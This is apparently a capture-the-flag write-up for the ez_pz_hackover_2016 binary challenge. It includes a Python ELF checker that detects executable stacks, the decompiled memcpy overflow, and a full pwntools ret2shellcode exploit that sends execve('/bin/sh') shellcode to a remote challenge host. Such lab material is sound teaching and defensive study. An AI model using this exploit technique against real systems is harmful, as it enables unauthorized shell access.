checksec
checksec shows that NX protection is not enabled (the binary has no GNU_STACK program header, so the stack is executable), which makes ret2shellcode a candidate technique.

```
[*] '/home/bronya/Documents/CTF/pwn17/ez_pz_hackover_2016'
    Arch:     i386-32-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x8048000)
    Stack:    Executable
    RWX:      Has RWX segments
```
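The three checksec lines that matter here (`NX unknown - GNU_STACK missing`, `Stack: Executable`, `RWX: Has RWX segments`) all come from the ELF program headers. The following added example, written for this post and not taken from checksec or from the challenge, reads those headers directly and reproduces the verdict; it goes beyond the 32-bit case on this page by handling ELF64 as well. The two sample images are constructed in-memory stand-ins (one shaped like this challenge binary, one shaped like a normally linked NX-enabled binary), not the real file; pass a path on the command line to check a real binary.

```python
import struct
import sys

PT_LOAD = 1
PT_GNU_STACK = 0x6474E551   # GNU extension: carries the stack permission flags
PF_X, PF_W, PF_R = 1, 2, 4


def _program_headers(data: bytes):
    """Yield (p_type, p_flags) for each program header of an ELF32 or ELF64 image."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    ei_class, ei_data = data[4], data[5]
    endian = "<" if ei_data == 1 else ">"
    if ei_class == 1:                                   # ELFCLASS32
        (phoff,) = struct.unpack_from(endian + "I", data, 28)
        phentsize, phnum = struct.unpack_from(endian + "HH", data, 42)
        for i in range(phnum):
            fields = struct.unpack_from(endian + "8I", data, phoff + i * phentsize)
            yield fields[0], fields[6]                  # p_type, p_flags
    elif ei_class == 2:                                 # ELFCLASS64
        (phoff,) = struct.unpack_from(endian + "Q", data, 32)
        phentsize, phnum = struct.unpack_from(endian + "HH", data, 54)
        for i in range(phnum):
            p_type, p_flags = struct.unpack_from(endian + "II", data, phoff + i * phentsize)
            yield p_type, p_flags
    else:
        raise ValueError("unknown ELF class")


def stack_policy(data: bytes) -> dict:
    """Derive what checksec's NX / Stack / RWX lines report from the program headers."""
    gnu_stack_flags = None
    rwx = 0
    for p_type, p_flags in _program_headers(data):
        if p_type == PT_GNU_STACK:
            gnu_stack_flags = p_flags
        elif p_type == PT_LOAD and p_flags & (PF_R | PF_W | PF_X) == (PF_R | PF_W | PF_X):
            rwx += 1
    if gnu_stack_flags is None:
        # No PT_GNU_STACK at all: the Linux x86 loader falls back to an executable
        # stack, which is what checksec's "NX unknown - GNU_STACK missing" means.
        return {"gnu_stack": False, "stack_executable": True, "rwx_segments": rwx}
    return {"gnu_stack": True,
            "stack_executable": bool(gnu_stack_flags & PF_X),
            "rwx_segments": rwx}


def build_elf32(phdrs):
    """Constructed minimal little-endian ELF32 image (test data, not a real binary)."""
    ehsize, phentsize = 52, 32
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 0, 0]) + b"\x00" * 7
    header = e_ident + struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0x8048000, ehsize, 0, 0,
                                   ehsize, phentsize, len(phdrs), 0, 0, 0)
    body = b"".join(struct.pack("<8I", t, 0, 0x8048000, 0x8048000, 0, 0, f, 0x1000)
                    for t, f in phdrs)
    return header + body


def build_elf64(phdrs):
    """Constructed minimal little-endian ELF64 image (test data, not a real binary)."""
    ehsize, phentsize = 64, 56
    e_ident = b"\x7fELF" + bytes([2, 1, 1, 0, 0]) + b"\x00" * 7
    header = e_ident + struct.pack("<HHIQQQIHHHHHH", 2, 62, 1, 0x400000, ehsize, 0, 0,
                                   ehsize, phentsize, len(phdrs), 0, 0, 0)
    body = b"".join(struct.pack("<IIQQQQQQ", t, f, 0, 0x400000, 0x400000, 0, 0, 0x1000)
                    for t, f in phdrs)
    return header + body


# Constructed stand-ins: CHALLENGE_LIKE mirrors the checksec output above (no GNU_STACK,
# one RWX PT_LOAD); HARDENED is the shape of a normally linked binary with NX enabled.
CHALLENGE_LIKE = build_elf32([(PT_LOAD, PF_R | PF_W | PF_X)])
HARDENED = build_elf32([(PT_LOAD, PF_R | PF_X), (PT_LOAD, PF_R | PF_W),
                        (PT_GNU_STACK, PF_R | PF_W)])

if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            print(sys.argv[1], stack_policy(fh.read()))
    else:
        print("challenge-like:", stack_policy(CHALLENGE_LIKE))
        print("hardened:      ", stack_policy(HARDENED))
```

The fix on the build side is to link with a GNU_STACK header whose flags lack PF_X (the default for modern toolchains; `-z noexecstack` forces it), so that `stack_executable` comes back False and shellcode written into a stack buffer cannot be run.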
Looking at the binary in IDA reveals a stack overflow: `dest` is only 50 bytes but `n` is 0x400, so shellcode can be written into `dest`.

```c
// IDA decompilation of vuln(): dest holds 50 bytes, yet n (0x400 here) bytes are
// copied into it from the argument area (&src) on the stack.
void *__cdecl vuln(int src, size_t n)
{
  char dest[50];
  return memcpy(dest, &src, n);
}
```
Build the exploit:

```python
from pwn import *

context(arch='i386', log_level='debug')
p = remote('node4.buuoj.cn', 26972)
elf = ELF('./ez_pz_hackover_2016')
printf_got = elf.got['printf']
printf_plt = elf.plt['printf']

# Stack is executable, so a plain execve("/bin/sh") shellcode can run from the buffer.
shellcode = asm(shellcraft.sh())

# The program leaks a stack address; the buffer sits 0x1c bytes below it.
p.recvuntil(b'Yippie, lets crash: 0x')
buf_addr = int(p.recv(8), 16) - 0x1c
print(hex(buf_addr))
shellcode_addr = buf_addr

# "crashme\0" passes the input check, padding reaches the saved return address,
# which is overwritten with the buffer address so execution lands on the shellcode.
payload = flat(b'crashme\x00', b'a' * (0x16 - 8), 0x0, shellcode_addr, shellcode)
p.sendlineafter(b'>', payload)
p.interactive()
```